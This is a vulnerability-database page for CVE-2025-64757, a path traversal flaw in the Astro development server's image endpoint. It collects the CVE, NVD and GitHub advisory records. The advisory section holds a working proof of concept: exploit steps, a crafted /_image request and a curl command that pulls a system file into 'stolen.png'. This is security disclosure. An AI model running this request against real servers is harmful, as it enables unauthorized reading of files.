cvelistv5 - cve-2025-64757

CVE-2025-64757 (GCVE-0-2025-64757)

Vulnerability from cvelistv5 – Published: 2025-11-19 16:40 – Updated: 2025-11-19 21:04

Summary

Astro is a web framework. Prior to version 5.14.3, a vulnerability has been identified in the Astro framework's development server that allows arbitrary local file read access through the image optimization endpoint. The vulnerability affects Astro development environments and allows remote attackers to read any image file accessible to the Node.js process on the host system. This issue has been patched in version 5.14.3.

Severity ?

3.5 (Low)


                        
                          CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CWE-23 - Relative Path Traversal

Assigner

GitHub_M

References

URL

Tags

	https://github.com/withastro/astro/security/advis…	x_refsource_CONFIRM
	https://github.com/withastro/astro/commit/b8ca69b…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	withastro	astro	Affected: < 5.14.3

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-64757",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-11-19T21:04:14.914682Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-11-19T21:04:23.556Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "astro",
          "vendor": "withastro",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 5.14.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Astro is a web framework. Prior to version 5.14.3, a vulnerability has been identified in the Astro framework\u0027s development server that allows arbitrary local file read access through the image optimization endpoint. The vulnerability affects Astro development environments and allows remote attackers to read any image file accessible to the Node.js process on the host system. This issue has been patched in version 5.14.3."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-23",
              "description": "CWE-23: Relative Path Traversal",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-11-19T16:40:36.031Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/withastro/astro/security/advisories/GHSA-x3h8-62x9-952g",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/withastro/astro/security/advisories/GHSA-x3h8-62x9-952g"
        },
        {
          "name": "https://github.com/withastro/astro/commit/b8ca69b97149becefaf89bf21853de9c905cdbb7",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/withastro/astro/commit/b8ca69b97149becefaf89bf21853de9c905cdbb7"
        }
      ],
      "source": {
        "advisory": "GHSA-x3h8-62x9-952g",
        "discovery": "UNKNOWN"
      },
      "title": "Astro Development Server is Vulnerable to Arbitrary Local File Read"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-64757",
    "datePublished": "2025-11-19T16:40:36.031Z",
    "dateReserved": "2025-11-10T22:29:34.875Z",
    "dateUpdated": "2025-11-19T21:04:23.556Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-64757\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-11-19T17:15:52.460\",\"lastModified\":\"2025-11-20T17:58:21.573\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Astro is a web framework. Prior to version 5.14.3, a vulnerability has been identified in the Astro framework\u0027s development server that allows arbitrary local file read access through the image optimization endpoint. The vulnerability affects Astro development environments and allows remote attackers to read any image file accessible to the Node.js process on the host system. This issue has been patched in version 5.14.3.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N\",\"baseScore\":3.5,\"baseSeverity\":\"LOW\",\"attackVector\":\"ADJACENT_NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.1,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"},{\"lang\":\"en\",\"value\":\"CWE-23\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:astro:astro:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"5.14.3\",\"matchCriteriaId\":\"48394CBD-D26B-4176-875E-32B9467D6157\"}]}]}],\"references\":[{\"url\":\"https://github.com/withastro/astro/commit/b8ca69b97149becefaf89bf21853de9c905cdbb7\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/withastro/astro/security/advisories/GHSA-x3h8-62x9-952g\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-64757\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-11-19T21:04:14.914682Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-11-19T21:04:20.345Z\"}}], \"cna\": {\"title\": \"Astro Development Server is Vulnerable to Arbitrary Local File Read\", \"source\": {\"advisory\": \"GHSA-x3h8-62x9-952g\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 3.5, \"attackVector\": \"ADJACENT_NETWORK\", \"baseSeverity\": \"LOW\", \"vectorString\": \"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"withastro\", \"product\": \"astro\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 5.14.3\"}]}], \"references\": [{\"url\": \"https://github.com/withastro/astro/security/advisories/GHSA-x3h8-62x9-952g\", \"name\": \"https://github.com/withastro/astro/security/advisories/GHSA-x3h8-62x9-952g\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/withastro/astro/commit/b8ca69b97149becefaf89bf21853de9c905cdbb7\", \"name\": \"https://github.com/withastro/astro/commit/b8ca69b97149becefaf89bf21853de9c905cdbb7\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Astro is a web framework. Prior to version 5.14.3, a vulnerability has been identified in the Astro framework\u0027s development server that allows arbitrary local file read access through the image optimization endpoint. The vulnerability affects Astro development environments and allows remote attackers to read any image file accessible to the Node.js process on the host system. This issue has been patched in version 5.14.3.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-23\", \"description\": \"CWE-23: Relative Path Traversal\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-11-19T16:40:36.031Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-64757\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-11-19T21:04:23.556Z\", \"dateReserved\": \"2025-11-10T22:29:34.875Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-11-19T16:40:36.031Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2025-64757

Vulnerability from fkie_nvd - Published: 2025-11-19 17:15 - Updated: 2025-11-20 17:58

Severity ?

3.5 (Low) - CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/withastro/astro/commit/b8ca69b97149becefaf89bf21853de9c905cdbb7	Patch
	security-advisories@github.com	https://github.com/withastro/astro/security/advisories/GHSA-x3h8-62x9-952g	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	astro	astro	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:astro:astro:*:*:*:*:*:node.js:*:*",
              "matchCriteriaId": "48394CBD-D26B-4176-875E-32B9467D6157",
              "versionEndExcluding": "5.14.3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Astro is a web framework. Prior to version 5.14.3, a vulnerability has been identified in the Astro framework\u0027s development server that allows arbitrary local file read access through the image optimization endpoint. The vulnerability affects Astro development environments and allows remote attackers to read any image file accessible to the Node.js process on the host system. This issue has been patched in version 5.14.3."
    }
  ],
  "id": "CVE-2025-64757",
  "lastModified": "2025-11-20T17:58:21.573",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "ADJACENT_NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 3.5,
          "baseSeverity": "LOW",
          "confidentialityImpact": "LOW",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.1,
        "impactScore": 1.4,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-11-19T17:15:52.460",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/withastro/astro/commit/b8ca69b97149becefaf89bf21853de9c905cdbb7"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/withastro/astro/security/advisories/GHSA-x3h8-62x9-952g"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        },
        {
          "lang": "en",
          "value": "CWE-23"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-X3H8-62X9-952G

Vulnerability from github – Published: 2025-11-19 19:43 – Updated: 2025-11-19 19:43

Summary

Astro Development Server has Arbitrary Local File Read

Details

Summary

A vulnerability has been identified in the Astro framework's development server that allows arbitrary local file read access through the image optimization endpoint. The vulnerability affects Astro development environments and allows remote attackers to read any image file accessible to the Node.js process on the host system.

Details

Title: Arbitrary Local File Read in Astro Development Image Endpoint
Type: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Component: /packages/astro/src/assets/endpoint/node.ts
Affected Versions: Astro v5.x development builds (confirmed v5.13.3)
Attack Vector: Network (HTTP GET request)
Authentication Required: None

The vulnerability exists in the Node.js image endpoint handler used during development mode. The endpoint accepts an href parameter that specifies the path to an image file. In development mode, this parameter is processed without adequate path validation, allowing attackers to specify absolute file paths.

Vulnerable Code Location: packages/astro/src/assets/endpoint/node.ts

// Vulnerable code in development mode
if (import.meta.env.DEV) {
    fileUrl = pathToFileURL(removeQueryString(replaceFileSystemReferences(src)));
} else {
    // Production has proper path validation
    // ... security checks omitted in dev mode
}

The development branch bypasses the security checks that exist in the production code path, which validates that file paths are within the allowed assets directory.

PoC

Attack Prerequisites

Astro development server must be running (astro dev)
The /_image endpoint must be accessible to the attacker
Target image files must be readable by the Node.js process

Exploit Steps

Start Astro Development Server: bash astro dev # Typically runs on http://localhost:4321
Craft Malicious Request: http GET /_image?href=/[ABSOLUTE_PATH_TO_IMAGE]&w=100&h=100&f=png HTTP/1.1 Host: localhost:4321
Example Attack: bash curl "http://localhost:4321/_image?href=/%2FSystem%2FLibrary%2FImage%20Capture%2FAutomatic%20Tasks%2FMakePDF.app%2FContents%2FResources%2F0blank.jpg&w=100&h=100&f=png" -o stolen.png

Demonstration Results

Test Environment: macOS with Astro v5.13.3

Successful Exploitation: - Target: /System/Library/Image Capture/Automatic Tasks/MakePDF.app/Contents/Resources/0blank.jpg - Response: HTTP 200 OK, Content-Type: image/png - Exfiltration: 303 bytes (100x100 PNG) - File Created: stolen-image.png containing processed system image

Attack Payload:

http://localhost:4321/_image?href=/%2FSystem%2FLibrary%2FImage%20Capture%2FAutomatic%20Tasks%2FMakePDF.app%2FContents%2FResources%2F0blank.jpg&w=100&h=100&f=png

Server Response:

Status: 200 OK
Content-Type: image/png
Content-Length: 303

Impact

Confidentiality Impact: HIGH

Scope: Any image file readable by the Node.js process
Exfiltration Method: Complete file contents via HTTP response (transformed to PNG)

Integrity Impact: NONE

The vulnerability only allows reading files, not modification

Availability Impact: NONE

No direct impact on system availability
Potential for resource exhaustion through repeated large image requests

Affected Components

Primary Component

File: packages/astro/src/assets/endpoint/node.ts
Function: loadLocalImage()
Lines: Development mode branch (~25-35)

Secondary Components

File: packages/astro/src/assets/endpoint/generic.ts
Impact: Uses different code path, not directly vulnerable
Note: Implements proper remote allowlist validation

Severity ?

3.5 (Low)


                  
                    CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "astro"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.14.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-64757"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-23"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-11-19T19:43:05Z",
    "nvd_published_at": "2025-11-19T17:15:52Z",
    "severity": "LOW"
  },
  "details": "### Summary\nA vulnerability has been identified in the Astro framework\u0027s development server that allows arbitrary local file read access through the image optimization endpoint. The vulnerability affects Astro development environments and allows remote attackers to read any image file accessible to the Node.js process on the host system.\n\n### Details\n- **Title**: Arbitrary Local File Read in Astro Development Image Endpoint\n- **Type**: CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\n- **Component**: `/packages/astro/src/assets/endpoint/node.ts`\n- **Affected Versions**: Astro v5.x development builds (confirmed v5.13.3)\n- **Attack Vector**: Network (HTTP GET request)\n- **Authentication Required**: None\n\nThe vulnerability exists in the Node.js image endpoint handler used during development mode. The endpoint accepts an `href` parameter that specifies the path to an image file. In development mode, this parameter is processed without adequate path validation, allowing attackers to specify absolute file paths.\n\n**Vulnerable Code Location**: `packages/astro/src/assets/endpoint/node.ts`\n\n```typescript\n// Vulnerable code in development mode\nif (import.meta.env.DEV) {\n    fileUrl = pathToFileURL(removeQueryString(replaceFileSystemReferences(src)));\n} else {\n    // Production has proper path validation\n    // ... security checks omitted in dev mode\n}\n```\n\nThe development branch bypasses the security checks that exist in the production code path, which validates that file paths are within the allowed assets directory.\n\n### PoC\n#### Attack Prerequisites\n1. Astro development server must be running (`astro dev`)\n2. The `/_image` endpoint must be accessible to the attacker\n3. Target image files must be readable by the Node.js process\n\n#### Exploit Steps\n\n1. Start Astro Development Server:\n   ```bash\n   astro dev  # Typically runs on http://localhost:4321\n   ```\n\n2. Craft Malicious Request:\n   ```http\n   GET /_image?href=/[ABSOLUTE_PATH_TO_IMAGE]\u0026w=100\u0026h=100\u0026f=png HTTP/1.1\n   Host: localhost:4321\n   ```\n\n3. Example Attack:\n   ```bash\n   curl \"http://localhost:4321/_image?href=/%2FSystem%2FLibrary%2FImage%20Capture%2FAutomatic%20Tasks%2FMakePDF.app%2FContents%2FResources%2F0blank.jpg\u0026w=100\u0026h=100\u0026f=png\" -o stolen.png\n   ```\n\n#### Demonstration Results\n\n**Test Environment**: macOS with Astro v5.13.3\n\n**Successful Exploitation**:\n- Target: `/System/Library/Image Capture/Automatic Tasks/MakePDF.app/Contents/Resources/0blank.jpg`\n- Response: HTTP 200 OK, Content-Type: image/png\n- Exfiltration: 303 bytes (100x100 PNG)\n- File Created: `stolen-image.png` containing processed system image\n\n**Attack Payload**:\n```\nhttp://localhost:4321/_image?href=/%2FSystem%2FLibrary%2FImage%20Capture%2FAutomatic%20Tasks%2FMakePDF.app%2FContents%2FResources%2F0blank.jpg\u0026w=100\u0026h=100\u0026f=png\n```\n\n**Server Response**:\n```\nStatus: 200 OK\nContent-Type: image/png\nContent-Length: 303\n```\n\n### Impact\n\n#### Confidentiality Impact: HIGH\n- **Scope**: Any image file readable by the Node.js process\n- **Exfiltration Method**: Complete file contents via HTTP response (transformed to PNG)\n\n#### Integrity Impact: NONE\n- The vulnerability only allows reading files, not modification\n\n#### Availability Impact: NONE  \n- No direct impact on system availability\n- Potential for resource exhaustion through repeated large image requests\n\n### Affected Components\n\n#### Primary Component\n- **File**: `packages/astro/src/assets/endpoint/node.ts`\n- **Function**: `loadLocalImage()`\n- **Lines**: Development mode branch (~25-35)\n\n#### Secondary Components  \n- **File**: `packages/astro/src/assets/endpoint/generic.ts`\n- **Impact**: Uses different code path, not directly vulnerable\n- **Note**: Implements proper remote allowlist validation",
  "id": "GHSA-x3h8-62x9-952g",
  "modified": "2025-11-19T19:43:05Z",
  "published": "2025-11-19T19:43:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/withastro/astro/security/advisories/GHSA-x3h8-62x9-952g"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64757"
    },
    {
      "type": "WEB",
      "url": "https://github.com/withastro/astro/commit/b8ca69b97149becefaf89bf21853de9c905cdbb7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/withastro/astro"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Astro Development Server has Arbitrary Local File Read"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-64757 (GCVE-0-2025-64757)

FKIE_CVE-2025-64757

GHSA-X3H8-62X9-952G

Summary

Details

PoC

Attack Prerequisites

Exploit Steps

Demonstration Results

Impact

Confidentiality Impact: HIGH

Integrity Impact: NONE

Availability Impact: NONE

Affected Components

Primary Component

Secondary Components

Tags

Sightings

Nomenclature